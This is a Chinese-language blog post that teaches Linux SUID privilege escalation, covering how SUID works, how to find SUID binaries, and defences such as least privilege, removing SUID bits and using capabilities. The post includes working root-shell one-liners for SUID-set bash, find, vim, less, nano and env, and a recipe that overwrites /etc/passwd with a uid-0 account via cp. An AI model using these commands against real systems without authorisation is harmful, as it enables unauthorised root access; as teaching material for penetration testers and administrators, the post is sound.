<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"way5211.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.25.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Linux SUID 提权详解：原理、发现与利用什么是 SUID？SUID (Set User ID) 是 Linux 和 Unix 系统的一种特殊文件权限。它允许用户以文件所有者的权限来执行该文件，而不是以当前用户的权限。 这是一种非常重要的功能，它允许普通用户临时获得更高权限来完成某些特定的任务。一个最经典的例子就是 passwd 命令。 一个简单的例子：&#x2F;usr&#x2F;bin&#x2F;passwd 文件所">
<meta property="og:type" content="article">
<meta property="og:title" content="suid提权">
<meta property="og:url" content="http://way5211.github.io/2025/09/14/suid/index.html">
<meta property="og:site_name" content="way">
<meta property="og:description" content="Linux SUID 提权详解：原理、发现与利用什么是 SUID？SUID (Set User ID) 是 Linux 和 Unix 系统的一种特殊文件权限。它允许用户以文件所有者的权限来执行该文件，而不是以当前用户的权限。 这是一种非常重要的功能，它允许普通用户临时获得更高权限来完成某些特定的任务。一个最经典的例子就是 passwd 命令。 一个简单的例子：&#x2F;usr&#x2F;bin&#x2F;passwd 文件所">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-09-14T10:08:28.000Z">
<meta property="article:modified_time" content="2025-09-14T16:09:06.698Z">
<meta property="article:author" content="way">
<meta property="article:tag" content="分享">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://way5211.github.io/2025/09/14/suid/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://way5211.github.io/2025/09/14/suid/","path":"2025/09/14/suid/","title":"suid提权"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>suid提权 | way</title>
  








  
  <script size="300" alpha="0.6" zIndex="-1" src="https://cdnjs.cloudflare.com/ajax/libs/ribbon.js/1.0.2/ribbon.min.js" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">way</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Linux-SUID-%E6%8F%90%E6%9D%83%E8%AF%A6%E8%A7%A3%EF%BC%9A%E5%8E%9F%E7%90%86%E3%80%81%E5%8F%91%E7%8E%B0%E4%B8%8E%E5%88%A9%E7%94%A8"><span class="nav-number">1.</span> <span class="nav-text">Linux SUID 提权详解：原理、发现与利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF-SUID%EF%BC%9F"><span class="nav-number">1.1.</span> <span class="nav-text">什么是 SUID？</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E4%BE%8B%E5%AD%90%EF%BC%9A-usr-bin-passwd"><span class="nav-number">1.1.1.</span> <span class="nav-text">一个简单的例子：&#x2F;usr&#x2F;bin&#x2F;passwd</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E8%AF%86%E5%88%AB-SUID-%E6%96%87%E4%BB%B6%EF%BC%9F"><span class="nav-number">1.2.</span> <span class="nav-text">如何识别 SUID 文件？</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%9A%E8%BF%87-ls-l-%E6%9F%A5%E7%9C%8B"><span class="nav-number">1.2.1.</span> <span class="nav-text">通过 ls -l 查看</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9F%A5%E6%89%BE%E7%B3%BB%E7%BB%9F%E4%B8%AD%E7%9A%84-SUID-%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.2.</span> <span class="nav-text">查找系统中的 SUID 文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88-SUID-%E4%BC%9A%E6%88%90%E4%B8%BA%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3%EF%BC%9F"><span class="nav-number">1.3.</span> <span class="nav-text">为什么 SUID 会成为安全隐患？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84-SUID-%E6%8F%90%E6%9D%83%E6%96%B9%E6%B3%95"><span class="nav-number">1.4.</span> <span class="nav-text">常见的 SUID 提权方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%B7%B2%E7%9F%A5%E5%8F%AF%E6%8F%90%E6%9D%83%E7%9A%84-SUID-%E7%A8%8B%E5%BA%8F"><span class="nav-number">1.4.1.</span> <span class="nav-text">1. 已知可提权的 SUID 程序</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#bash-sh-zsh-%E7%AD%89-Shell"><span class="nav-number">1.4.1.1.</span> <span class="nav-text">bash &#x2F; sh &#x2F; zsh 等 Shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#find"><span class="nav-number">1.4.1.2.</span> <span class="nav-text">find</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#vim-vi"><span class="nav-number">1.4.1.3.</span> <span class="nav-text">vim &#x2F; vi</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#less-more"><span class="nav-number">1.4.1.4.</span> <span class="nav-text">less &#x2F; more</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#cp"><span class="nav-number">1.4.1.5.</span> <span class="nav-text">cp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#env"><span class="nav-number">1.4.1.6.</span> <span class="nav-text">env</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#nano"><span class="nav-number">1.4.1.7.</span> <span class="nav-text">nano</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%88%A9%E7%94%A8%E7%A8%8B%E5%BA%8F%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.4.2.</span> <span class="nav-text">2. 利用程序漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E5%85%B1%E4%BA%AB%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5-SO-Injection"><span class="nav-number">1.4.3.</span> <span class="nav-text">3. 共享对象注入 (SO Injection)</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E9%98%B2%E8%8C%83-SUID-%E6%8F%90%E6%9D%83%EF%BC%9F"><span class="nav-number">1.5.</span> <span class="nav-text">如何防范 SUID 提权？</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%8E%9F%E5%88%99%EF%BC%9A%E6%9C%80%E5%B0%8F%E6%9D%83%E9%99%90%E5%8E%9F%E5%88%99"><span class="nav-number">1.5.1.</span> <span class="nav-text">1. 原则：最小权限原则</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%AE%A1%E8%AE%A1%E5%92%8C%E7%A7%BB%E9%99%A4%E4%B8%8D%E5%BF%85%E8%A6%81%E7%9A%84-SUID"><span class="nav-number">1.5.2.</span> <span class="nav-text">2. 审计和移除不必要的 SUID</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E4%BD%BF%E7%94%A8%E5%85%B6%E4%BB%96%E6%9C%BA%E5%88%B6%E6%9B%BF%E4%BB%A3"><span class="nav-number">1.5.3.</span> <span class="nav-text">3. 使用其他机制替代</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E4%BF%9D%E6%8C%81%E7%B3%BB%E7%BB%9F%E5%92%8C%E8%BD%AF%E4%BB%B6%E6%9B%B4%E6%96%B0"><span class="nav-number">1.5.4.</span> <span class="nav-text">4. 保持系统和软件更新</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.6.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="way"
      src="/images/test_luffy.png">
  <p class="site-author-name" itemprop="name">way</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://way5211.github.io/2025/09/14/suid/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/test_luffy.png">
      <meta itemprop="name" content="way">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="way">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="suid提权 | way">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          suid提权
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-09-14 18:08:28" itemprop="dateCreated datePublished" datetime="2025-09-14T18:08:28+08:00">2025-09-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-09-15 00:09:06" itemprop="dateModified" datetime="2025-09-15T00:09:06+08:00">2025-09-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">渗透</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="Linux-SUID-提权详解：原理、发现与利用"><a href="#Linux-SUID-提权详解：原理、发现与利用" class="headerlink" title="Linux SUID 提权详解：原理、发现与利用"></a>Linux SUID 提权详解：原理、发现与利用</h1><h2 id="什么是-SUID？"><a href="#什么是-SUID？" class="headerlink" title="什么是 SUID？"></a>什么是 SUID？</h2><p>SUID (Set User ID) 是 Linux 和 Unix 系统的一种特殊文件权限。它允许用户以<strong>文件所有者的权限</strong>来执行该文件，而不是以当前用户的权限。</p>
<p>这是一种非常重要的功能，它允许普通用户临时获得更高权限来完成某些特定的任务。一个最经典的例子就是 <code>passwd</code> 命令。</p>
<h3 id="一个简单的例子：-usr-bin-passwd"><a href="#一个简单的例子：-usr-bin-passwd" class="headerlink" title="一个简单的例子：/usr/bin/passwd"></a>一个简单的例子：<code>/usr/bin/passwd</code></h3><ul>
<li><strong>文件所有者：</strong> <code>root</code></li>
<li><strong>普通用户：</strong> <code>alice</code></li>
<li><strong>正常情况：</strong> <code>alice</code> 无法修改 <code>/etc/shadow</code> 文件（该文件存储用户密码哈希，只有 root 可读写）。</li>
<li><strong>SUID 的作用：</strong> <code>/usr/bin/passwd</code> 命令设置了 SUID 位，并且它的所有者是 <code>root</code>。当 <code>alice</code> 执行 <code>passwd</code> 命令时，这个进程会暂时以 <code>root</code> 权限运行，因此它可以成功地写入 <code>/etc/shadow</code> 文件来更改 <code>alice</code> 自己的密码。</li>
</ul>
<h2 id="如何识别-SUID-文件？"><a href="#如何识别-SUID-文件？" class="headerlink" title="如何识别 SUID 文件？"></a>如何识别 SUID 文件？</h2><p>SUID 权限在文件权限位上用一个 <code>s</code> 来表示，它取代了通常的 <code>x</code>（执行）权限。</p>
<h3 id="通过-ls-l-查看"><a href="#通过-ls-l-查看" class="headerlink" title="通过 ls -l 查看"></a>通过 <code>ls -l</code> 查看</h3><p>查看 <code>/usr/bin/passwd</code> 的权限：</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -l /usr/bin/passwd</span><br></pre></td></tr></table></figure>

<p>输出结果：<br><code>-rwsr-xr-x 1 root root 63960 Feb  7  2020 /usr/bin/passwd</code></p>
<p>注意所有者权限位中的 <code>rws</code>，这里的 <code>s</code> 就表示该文件设置了 SUID 位。</p>
<h3 id="查找系统中的-SUID-文件"><a href="#查找系统中的-SUID-文件" class="headerlink" title="查找系统中的 SUID 文件"></a>查找系统中的 SUID 文件</h3><p>在渗透测试或系统安全审计中，寻找所有设置了 SUID 位的文件是发现提权机会的关键第一步。可以使用 <code>find</code> 命令来全局查找：</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 查找所有 SUID 文件</span><br><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br><span class="line"></span><br><span class="line"># 解释：</span><br><span class="line"># /              : 从根目录开始搜索</span><br><span class="line"># -perm -u=s     : 查找权限模式包含“设置用户ID (SUID)”的文件</span><br><span class="line"># -type f        : 只查找普通文件</span><br><span class="line"># 2&gt;/dev/null    : 将错误信息（如权限不足）重定向到空设备，使输出更清晰</span><br></pre></td></tr></table></figure>



<h2 id="为什么-SUID-会成为安全隐患？"><a href="#为什么-SUID-会成为安全隐患？" class="headerlink" title="为什么 SUID 会成为安全隐患？"></a>为什么 SUID 会成为安全隐患？</h2><p>SUID 的设计初衷是好的，但如果一个本身具有高权限（如 root）且本不应被普通用户随意使用的程序被设置了 SUID 位，那么它就可能成为攻击者提升权限的跳板。</p>
<p>常见的风险场景包括：</p>
<ol>
<li><strong>管理员错误配置：</strong> 给一个普通程序（如 <code>vim</code>, <code>nano</code>, <code>bash</code>）设置了 SUID 位。</li>
<li><strong>程序本身存在漏洞：</strong> 即使程序本身设计是合理的（如 <code>passwd</code>），如果程序中存在缓冲区溢出、命令注入等漏洞，攻击者也可能利用其高权限执行任意代码。</li>
<li><strong>功能滥用：</strong> 某些具有 SUID 权限的程序（如 <code>find</code>, <code>cp</code>, <code>env</code>）可以通过巧妙的参数配置来执行命令或覆盖敏感文件，从而被滥用。</li>
</ol>
<h2 id="常见的-SUID-提权方法"><a href="#常见的-SUID-提权方法" class="headerlink" title="常见的 SUID 提权方法"></a>常见的 SUID 提权方法</h2><h3 id="1-已知可提权的-SUID-程序"><a href="#1-已知可提权的-SUID-程序" class="headerlink" title="1. 已知可提权的 SUID 程序"></a>1. 已知可提权的 SUID 程序</h3><p>一些程序如果配置了 SUID，很容易被直接用来提权。</p>
<h4 id="bash-sh-zsh-等-Shell"><a href="#bash-sh-zsh-等-Shell" class="headerlink" title="bash &#x2F; sh &#x2F; zsh 等 Shell"></a><code>bash</code> &#x2F; <code>sh</code> &#x2F; <code>zsh</code> 等 Shell</h4><p>如果 Shell 解释器本身具有 SUID 权限，可以直接获取一个高权限的 shell。</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 如果发现 /bin/bash 是 SUID root</span><br><span class="line">ls -l /bin/bash</span><br><span class="line"># -rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash</span><br><span class="line"></span><br><span class="line"># 直接运行它，即可获得一个 root shell</span><br><span class="line">/bin/bash -p # -p 参数用于保留提升的权限</span><br></pre></td></tr></table></figure>



<h4 id="find"><a href="#find" class="headerlink" title="find"></a><code>find</code></h4><p><code>find</code> 命令功能强大，其中的 <code>-exec</code> 参数可以执行命令。</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 利用 find 执行命令</span><br><span class="line">find . -exec /bin/sh -p \; -quit</span><br><span class="line"></span><br><span class="line"># 或者直接获取 shell</span><br><span class="line">find . -exec /bin/bash -p \;</span><br></pre></td></tr></table></figure>



<h4 id="vim-vi"><a href="#vim-vi" class="headerlink" title="vim &#x2F; vi"></a><code>vim</code> &#x2F; <code>vi</code></h4><p>如果 Vim 具有 SUID 权限，可以在其内部执行系统命令。</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 运行 vim</span><br><span class="line">vim</span><br><span class="line"></span><br><span class="line"># 在 vim 的命令模式下执行：</span><br><span class="line">:set shell=/bin/sh</span><br><span class="line">:shell</span><br><span class="line"># 或者更简单</span><br><span class="line">:! /bin/bash -p</span><br></pre></td></tr></table></figure>



<h4 id="less-more"><a href="#less-more" class="headerlink" title="less &#x2F; more"></a><code>less</code> &#x2F; <code>more</code></h4><p>分页阅读器同样可以在其界面中执行命令。</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 运行 less 或 more 查看一个长文件</span><br><span class="line">less /etc/passwd</span><br><span class="line">more /etc/passwd</span><br><span class="line"></span><br><span class="line"># 在阅读界面中，输入：</span><br><span class="line">! /bin/bash -p</span><br></pre></td></tr></table></figure>



<h4 id="cp"><a href="#cp" class="headerlink" title="cp"></a><code>cp</code></h4><p>利用 <code>cp</code> 命令覆盖敏感文件，如 <code>/etc/passwd</code> 或 SSH authorized_keys，从而添加新的 root 用户或允许 root 登录。</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># 1. 生成一个密码哈希（例如，密码为 &quot;newpass&quot;）</span><br><span class="line">openssl passwd -1 -salt abc newpass</span><br><span class="line"># 输出：$1$abc$TKMIAf4QNo/z7lT6L9xxL.</span><br><span class="line"></span><br><span class="line"># 2. 创建一个新的 passwd 文件行</span><br><span class="line">echo &#x27;newroot:$1$abc$TKMIAf4QNo/z7lT6L9xxL.:0:0:root:/root:/bin/bash&#x27; &gt; /tmp/newpasswd</span><br><span class="line"></span><br><span class="line"># 3. 使用 SUID 的 cp 覆盖原文件</span><br><span class="line">cp /tmp/newpasswd /etc/passwd</span><br><span class="line"></span><br><span class="line"># 4. 切换到 newroot 用户</span><br><span class="line">su newroot</span><br><span class="line"># 输入密码：newpass</span><br></pre></td></tr></table></figure>



<h4 id="env"><a href="#env" class="headerlink" title="env"></a><code>env</code></h4><p><code>env</code> 命令可以调用其他程序，绕过路径限制。</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">env /bin/sh -p</span><br></pre></td></tr></table></figure>



<h4 id="nano"><a href="#nano" class="headerlink" title="nano"></a><code>nano</code></h4><p>类似于 Vim，Nano 也可以在编辑文件时执行命令。</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nano</span><br><span class="line"># 按 Ctrl + R，然后按 Ctrl + X</span><br><span class="line"># 然后输入：/bin/bash -p</span><br></pre></td></tr></table></figure>



<h3 id="2-利用程序漏洞"><a href="#2-利用程序漏洞" class="headerlink" title="2. 利用程序漏洞"></a>2. 利用程序漏洞</h3><p>如果某个 SUID 程序存在漏洞（如缓冲区溢出），则需要编写或利用现有的漏洞利用代码（Exploit）来攻击它，使其执行我们的恶意载荷（Payload），从而获得一个高权限的 shell。这需要一定的逆向工程和漏洞分析能力。</p>
<p><strong>资源：</strong> 在 <a target="_blank" rel="noopener" href="https://www.exploit-db.com/">Exploit-DB</a> 或 GitHub 上搜索相关程序的漏洞利用代码。</p>
<h3 id="3-共享对象注入-SO-Injection"><a href="#3-共享对象注入-SO-Injection" class="headerlink" title="3. 共享对象注入 (SO Injection)"></a>3. 共享对象注入 (SO Injection)</h3><p>在某些情况下，SUID 程序在运行时可能会加载我们可控的共享库（<code>.so</code> 文件），从而导致代码执行。可以通过 <code>strace</code> 命令来追踪程序运行时所调用的库文件。</p>
<h2 id="如何防范-SUID-提权？"><a href="#如何防范-SUID-提权？" class="headerlink" title="如何防范 SUID 提权？"></a>如何防范 SUID 提权？</h2><h3 id="1-原则：最小权限原则"><a href="#1-原则：最小权限原则" class="headerlink" title="1. 原则：最小权限原则"></a>1. 原则：最小权限原则</h3><ul>
<li>除非绝对必要，否则不要给任何文件设置 SUID 位。</li>
<li>定期审计系统中的应用，移除不必要的 SUID 权限。</li>
</ul>
<h3 id="2-审计和移除不必要的-SUID"><a href="#2-审计和移除不必要的-SUID" class="headerlink" title="2. 审计和移除不必要的 SUID"></a>2. 审计和移除不必要的 SUID</h3><p>使用前面提到的 <code>find</code> 命令查找 SUID 文件，并问自己一个问题：<strong>这个程序真的需要以 root 权限运行吗？</strong></p>
<p>移除不必要的 SUID 位：</p>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo chmod u-s /path/to/file</span><br></pre></td></tr></table></figure>



<h3 id="3-使用其他机制替代"><a href="#3-使用其他机制替代" class="headerlink" title="3. 使用其他机制替代"></a>3. 使用其他机制替代</h3><ul>
<li>对于需要特权操作的场景，考虑使用 <code>sudo</code> 来更精细地控制命令的执行权限，而不是滥用 SUID。</li>
<li>使用功能（Capabilities）机制，将 root 的权限分解为一系列独立的能力，只赋予程序所需的最小能力集，而不是完整的 root 权限。例如，赋予 <code>ping</code> 命令 <code>CAP_NET_RAW</code> 能力而不是设置 SUID。</li>
</ul>
<p>bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 移除 ping 的 SUID 位</span><br><span class="line">sudo chmod u-s /bin/ping</span><br><span class="line"># 赋予它 CAP_NET_RAW 能力</span><br><span class="line">sudo setcap cap_net_raw+ep /bin/ping</span><br></pre></td></tr></table></figure>



<h3 id="4-保持系统和软件更新"><a href="#4-保持系统和软件更新" class="headerlink" title="4. 保持系统和软件更新"></a>4. 保持系统和软件更新</h3><p>及时更新系统和软件，修补已知的漏洞，防止攻击者利用SUID程序的漏洞进行提权。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>SUID 是一把双刃剑，它既是系统正常运行所必需的功能，也可能成为攻击者提权的入口。理解 SUID 的工作原理，掌握发现和利用 SUID 文件的方法，对于渗透测试者和系统管理员都至关重要。同时，坚守<strong>最小权限原则</strong>，定期审计和加固系统，是防御 SUID 提权攻击最有效的手段。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%88%86%E4%BA%AB/" rel="tag"># 分享</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/09/14/hello-world/" rel="prev" title="Hello World">
                  <i class="fa fa-angle-left"></i> Hello World
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">way</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
